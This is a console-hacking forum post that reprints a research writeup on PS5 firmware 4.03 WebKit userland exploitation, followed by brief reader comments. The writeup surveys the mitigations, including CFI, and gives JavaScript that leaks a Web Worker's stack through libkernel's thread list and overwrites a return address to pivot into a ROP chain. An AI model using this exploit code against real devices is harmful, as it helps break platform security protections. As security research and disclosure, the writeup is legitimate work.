PS5 Jailbreaking | Thread starter: PSXHAX | Start date: Jan 26, 2022 at 10:53 PM
In PlayStation 5 Scene news today, developers ChendoChap and @zezu420 (Znullptr on Twitter, aka dmiller423) released PS5 Webkit Execution documentation and related code for 4.03 ROP userland exploitation on PlayStation 5 (3.20 is now included as well), noting that DNS redirection to HTTPS works.

Download: PS5-Webkit-Execution-main.zip / GIT

This follows the PS5 4.03 Webkit Exploit implementation, the PS5 Kernel Exploit (ExFAT Bug), the PlayStation 5 Debug Settings & Root Keys and the 4.03 PS5 Kernel Build String that surfaced earlier this month, in anticipation of a full PS5 Jailbreak exploit becoming publicly available.

Without further ado, here's the PS5 Webkit Execution writeup README via GitHub:

# Exploring the PlayStation 5 Security - Userland

## Introduction

The PlayStation 5 was released on November 12th 2020. While it is similar to the PS4 in its architecture, the security model is vastly improved on both the kernel and userland fronts. Below is some key information on the system software and some of the changes from the last generation.
  • Uses FreeBSD 11.
  • No development access (ie. can't run unsigned code without exploits).
  • To date there are no public exploits.
  • Added mitigations in kernel and userland.
  • Added hypervisor that handles security and app containers.
## Userland Overview

Back in September, Project Zero released a report for what they believed to be CVE-2021-30858; this turned out to be wrong, as the bug they were describing was actually CVE-2021-30889. A proof of concept was written for PS4 by sleirsgoevy, which we later modified to gain ROP execution on 9.00 for the kernel exploit. The vulnerability itself won't be covered here; this writeup focuses on taking the arbitrary read/write and leakobj()/fakeobj() primitives the exploit provides and turning them into code execution on PS5.

Lower firmwares such as 2.00 don't seem to be vulnerable, likely because the relevant FontFace code isn't present in older builds of WebKit (this holds true on PS4 as well, as firmwares lower than 9.00 can't be exploited with this WebKit bug).

On firmware 4.03, however, we found the browser was vulnerable. Unfortunately, the exploit strategy used on PS4 could not be used on PS5 because of clang-based CFI. On PS4, we can use leakobj() and the arbitrary write primitive to leak an HTMLTextArea's vtable and smash one of the various virtual calls for code execution. On PS5, these virtual calls are verified.

Virtual calls now have code that looks something like this, where the call's target address is checked before it is taken:

[Image: PS5 Webkit Execution 4.03 ROP Userland Exploitation on PlayStation 5.png]


## Mitigations

| Name | Kernel | User | Description |
|---|---|---|---|
| SMEP: Supervisor Mode Execution Prevention | x | - | SMEP prevents supervisor mode from executing user-space code. |
| SMAP: Supervisor Mode Access Prevention | x | - | Complements SMEP by extending the protection to reads and writes. |
| XOM: eXecute Only Memory (R^X) | x | x | Disallows reading any memory page marked as executable. |
| Clang-CFI: Control Flow Integrity | x | x | Protects against forward-edge control-flow hijack (virtual calls, etc.). |

### Clang's Control Flow Integrity flags

| -fsanitize=cfi- | Description |
|---|---|
| cast-strict | Enables strict cast checks. |
| derived-cast | Base-to-derived cast to the wrong dynamic type. |
| unrelated-cast | Cast from void* or another unrelated type to the wrong dynamic type. |
| nvcall | Non-virtual call via an object whose vptr is of the wrong dynamic type. |
| vcall | Virtual call via an object whose vptr is of the wrong dynamic type. |
| icall | Indirect call of a function with the wrong dynamic type. |
| mfcall | Indirect call via a member function pointer with the wrong dynamic type. |
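Added example (not from the writeup and not Clang's own implementation): the vcall check that `-fsanitize=cfi-vcall` inserts before every virtual call, written out by hand in C++ so it is visible why the PS4-style vtable smash described above is refused on PS5. `Element`/`TextArea` are hypothetical stand-ins for WebKit DOM classes, and a `std::set` of vtable pointers replaces the compact bit vector Clang builds at link time.

```cpp
#include <cstring>
#include <set>
// Hypothetical stand-ins for the WebKit DOM classes the writeup mentions.
struct Element {
    virtual ~Element() = default;
    virtual int tag() const { return 1; }
};
struct TextArea : Element {
    int tag() const override { return 2; }
};

// On the Itanium C++ ABI the vptr is the first machine word of a polymorphic object.
static const void* vptr_of(const Element* obj) {
    const void* v;
    std::memcpy(&v, obj, sizeof v);
    return v;
}

// The vtables a call through `Element*` may legitimately dispatch on: one per class
// in the hierarchy. Clang derives this set at LTO link time; a std::set stands in here.
static const std::set<const void*>& valid_element_vtables() {
    static const std::set<const void*> s = [] {
        Element e; TextArea t;
        return std::set<const void*>{vptr_of(&e), vptr_of(&t)};
    }();
    return s;
}

// Mirrors an instrumented virtual call: check the vptr, then dispatch.
// Real CFI traps (ud2) on failure; -1 is returned instead so it can be tested.
int checked_tag(const Element* obj) {
    if (!valid_element_vtables().count(vptr_of(obj))) return -1;  // call refused
    return obj->tag();
}

// A genuine TextArea passes the check and dispatches normally.
int tag_of_real_textarea() {
    TextArea t;
    return checked_tag(&t);
}

// An object whose first word was overwritten with an attacker-chosen pointer,
// the PS4 vtable-smash pattern: the check fails before anything is called.
int tag_of_smashed_object() {
    static const void* fake_vtable[4] = {nullptr, nullptr, nullptr, nullptr};
    struct { const void* vptr; } smashed{fake_vtable};
    return checked_tag(reinterpret_cast<const Element*>(&smashed));
}
```

Building a real target with `-flto -fvisibility=hidden -fsanitize=cfi-vcall` makes Clang emit the equivalent check automatically, trapping instead of returning -1.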
## WebKit Exploit Implementation

### Overview

An alternative was needed to achieve code execution in WebKit. Thankfully, PS5's CFI is only forward-edge and does not use a shadow stack, so backward-edge attacks (such as attacking return addresses on the stack) are fair game. JavaScript provides a somewhat interesting piece of functionality called Web Workers. These Workers are at their core simple threads which execute JavaScript in an isolated environment. They were useful for exploitation, as they have a reliable stack we could leak, and they give us a thread to pivot to our ROP chain.

### Leaking a worker stack

The libkernel library used by WebKit (and many other applications) keeps a list of threads for that process, and includes information such as the stack address and size. By iterating this list using the arbitrary read/write, we can find a worker's stack address.
```javascript
function find_worker() {
    // Offsets into libkernel's per-thread structure.
    const PTHREAD_NEXT_THREAD_OFFSET = 0x38;
    const PTHREAD_STACK_ADDR_OFFSET = 0xA8;
    const PTHREAD_STACK_SIZE_OFFSET = 0xB0;

    // Walk the process thread list, starting at libkernel's list head.
    for (let thread = p.read8(libKernelBase.add32(OFFSET_lk__thread_list));
         thread.low != 0x0 && thread.hi != 0x0;
         thread = p.read8(thread.add32(PTHREAD_NEXT_THREAD_OFFSET))) {
        let stack = p.read8(thread.add32(PTHREAD_STACK_ADDR_OFFSET));
        let stacksz = p.read8(thread.add32(PTHREAD_STACK_SIZE_OFFSET));
        // Worker threads are recognised by their 0x80000-byte stack.
        if (stacksz.low == 0x80000) {
            return stack;
        }
    }
    alert("failed to find worker.");
}
```
### Launching a ROP chain

Once we have a worker stack, we can smash a known return address on the stack to stack pivot and get ROP running. Because the stack layout is deterministic, we can set up a dummy worker with a postMessage handler and overwrite the return address at stack+0x7FB88.
```javascript
// Per-firmware offset of the target return address within the worker stack.
const OFFSET_WORKER_STACK_OFFSET = set_offset_for_platform(0x0007FB88, 0x0007FB28);
// ...
let return_address_ptr = worker_stack.add32(OFFSET_WORKER_STACK_OFFSET);
let original_return_address = p.read8(return_address_ptr);
let stack_pointer_ptr = return_address_ptr.add32(0x8);
// ...
async function launch_chain(chain) {
    // ...

    // overwrite return address
    p.write8(return_address_ptr, gadgets["pop rsp"]);
    p.write8(stack_pointer_ptr, chain.stack_entry_point);

    // Posting a message makes the worker return through the smashed frame.
    let p1 = await new Promise((resolve) => {
        const channel = new MessageChannel();
        channel.port1.onmessage = () => {
            channel.port1.close();
            resolve(1);
        };
        worker.postMessage(0, [channel.port2]);
    });

    // ...
}
```
## Conclusion

Gaining userland code execution on PS5 is trickier than on PS4, but it is possible. Of course, this was made easier by the fact that we have binaries* and thus access to ROP gadgets. Otherwise, achieving code execution would have been far more difficult due to XOM. This is a userland exploit. Attacking the kernel is much more difficult due to the above mitigations, and is left for a future writeup.

## Credits

ChendoChap && Znullptr

### Thanks
  • Anonymous*
  • Specter
  • sleirsgoevy
  • Everyone that donated.
Those who would like to support continued development work from Znullptr (aka dmiller423) may do so via BTC Donations, GoFundMe, becoming a GitHub Sponsor or Patreon.

TL;DR: From @SpecterDev on Twitter, to quote: "Was hoping to get exfat bug working but the exploit scenario on PS5 is much tougher than PS4. Might still be possible to find a way but a lot of work will need to be put into finding a viable path. But at least the userland portion is out there so it can be attempted/tested :p"

And from Znullptr, to quote: "NO - DO NOT UPDATE. This is NOT a kernel+hv exploit; this was the firmware version we had available vulnerable to the webkit bug. There are no guarantees kernel or hv exploits in the future will be for > 4.03. It's NOT worth updating!"

Cheers to blood88 for the heads-up on this earlier today!

Comments

wolfsstolz:

I bought myself an Xbox Series S; as a gamer you can't do anything without an Xbox. CoD games in the future will only be on Xbox, I think; Bethesda is now in Microsoft's hands, and that is the first time I have bought an Xbox, and with Game Pass it is really a good deal.

The next step is a PS5, I think, but I think the devs had better hold the exploit and see whether the PS5 is available for everyone to buy. At this moment in Germany most people don't have a PS5, and Sony will close the exploit fast. If Sony closes the exploit without any big talk about it, then they can release it.
 

djluiluv:

"War has changed".... - Old Snake

If we get K exploit on PS5, it will probably be the greatest mod-able console ever. Period. I get excited just thinking about it... :evilsmile:
 

olsztyn41:

@wolfsstolz this is already patched in 4.50.

I already got 4x PS5 in Germany. The last one that I got on Amazon came with Horizon Forbidden West; it will be sent to me on 18 Feb.

Use radarbot for Telegram and get a PS5. My family is now full of PS5s. :)
 
Status
Not open for further replies.

:fire: Latest Help Topics

Top